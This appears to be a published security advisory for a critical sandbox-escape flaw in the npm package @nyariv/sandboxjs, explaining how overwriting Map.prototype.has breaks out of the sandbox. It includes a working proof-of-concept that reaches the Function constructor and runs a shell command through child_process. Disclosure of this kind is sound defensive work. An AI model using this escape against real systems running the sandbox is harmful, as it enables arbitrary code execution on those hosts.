Launch Week Day 1: Announcing Security Design Review
Start for Free
CRITICAL 10.0 npm

@nyariv/sandboxjs has a Sandbox Escape vulnerability

GHSA-66h4-qj4x-38xp · CVE-2026-25587

Published · Modified

Description

Summary

As Map is in SAFE_PROTOYPES, it's prototype can be obtained via Map.prototype. By overwriting Map.prototype.has the sandbox can be escaped.

Details

This is effectively equivalent to CVE-2026-25142, but without __lookupGetter__ (let was used during testing), it turns out the let implementation is bugged:

let a = Map.prototype;
console.log(a) // undefined

const a = Map.prototype;
console.log(a) // Object [Map] {}

let a = 123;
console.log(a) // 123

const a = 123;
console.log(a) // 123

PoC

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
const m = Map.prototype;
m.has = isFinite;

console.log(
  isFinite.constructor(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);`;

sb.compile(payload)().run();

Impact

Able to set Map.prototype.has -> RCE

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes